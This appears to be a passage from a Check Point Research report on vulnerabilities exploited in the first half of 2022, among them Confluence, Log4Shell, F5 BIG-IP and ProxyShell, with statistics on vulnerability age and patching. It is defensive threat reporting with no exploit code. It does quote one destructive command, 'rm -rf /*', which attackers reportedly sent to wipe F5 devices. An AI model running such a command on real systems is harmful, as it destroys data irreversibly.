The following list of top vulnerabilities is based on data collected by the Check Point Intrusion Prevention System (IPS) sensor net and details some of the most popular and interesting attack techniques and exploits observed by CPR in the first half of 2022.
The critical remote code execution vulnerability was reported in May 2022 to Atlassian following its in-the-wild discovery as a zero-day. Affecting all supported versions of Confluence Server and Data Center, it was characterized as an Object-Graph Navigation Language (OGNL) injection vulnerability that could lead to execution of arbitrary code by an unauthenticated actor, resulting in the targeted system’s takeover. Although Atlassian released fixes in early June, since its discovery the vulnerability has become very popular, and was adapted by a wide range of threat actors to deploy backdoors, ransomware, cryptominers and botnets to vulnerable networks. Volexity, who first discovered the vulnerability, reported that Chinese affiliated attackers were leveraging this exploit on vulnerable servers to deploy web shells, as an initial foothold into targeted organizations. According to CPR, attacks relating to this vulnerability affected approximatively 14% of organizations worldwide.
Apache Log4j is an open-source Java-based logging package provided by the Apache Software Foundation and is used by millions of Java-based applications worldwide to record activities. In late 2021, the Apache Foundation released an emergency Log4j version to address a critical flaw in the logging framework that enables threat actors to compromise a machine by simply sending it a simple string. Called ‘Log4Shell’, the vulnerability took the security community by storm, due to the magnitude of its influence – millions of companies,including Tesla, Amazon and Apple, use Log4j. Numerous attacks were observed and during 2022 Log4Shell remained one of the most highly exploited vulnerabilities. The vulnerability’s simplicity and reach attracted both low-skilled and advanced threat groups. Iranian-aligned APT35 exploited Log4Shell to distribute a new and modular PowerShell toolkit, and China-based threat group Deep Panda used Log4Shell to exploit vulnerable VMware Horizon servers.
CVE-2022-1388 is a Remote Code Execution (RCE) vulnerability (9.8 CVSS score) initially published by F5 on May 4. The vulnerability affects the BIG-IP line of products; in less than a week, multiple threat actors began to massively exploit it to drop malicious payloads to thousands of exposed systems. By May 18, CISA published an additional alert, warning that PoC publications enabled “less sophisticated actors” to exploit the vulnerability.
Other attackers refrained from using unpatched F5 BIG-IP devices to gain their initial foothold in organizations, and instead chose a path of destruction, sending the notorious “rm -rf /*” command which erased most of the data on vulnerable devices, including essential configuration data.
Many vulnerabilities discovered in 2017 maintained a strong presence throughout 2022, similar to their behavior in 2021. This is mostly due to popular flaws like the Apache Struts2 Remote Code Execution (CVE-2017-5638) which is used by botnets, or the PHPUnit remote code execution (CVE-2017-9841), often used to exploit vulnerable WordPress plugins. According to the chart above, vulnerabilities disclosed in 2021-2022 were only exploited in 9.8% of the attacks leveraging vulnerabilities observed by CPR. However, information collected by the Check Point Incident Response Team (CPIRT) and shared in the current report allows us to examine the age of vulnerabilities used in successful attacks – not only attack attempts prevented by Check Point products – and draw our conclusions.
According to CPIRT, the most common vulnerability observed in the first half of 2022, used in no fewer than 69% of the cases, is the ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) disclosed in August 2021. This piece of data demonstrates that while attackers heavily exploit 4-5 year old vulnerabilities, successful attacks often rely on newly discovered flaws, probably before the organizations patched its vulnerable servers. The data also shows that older vulnerabilities are constantly exploited – most likely by low-skilled attackers and with much lower success rate. These findings once again highlight the importance of timely system patching.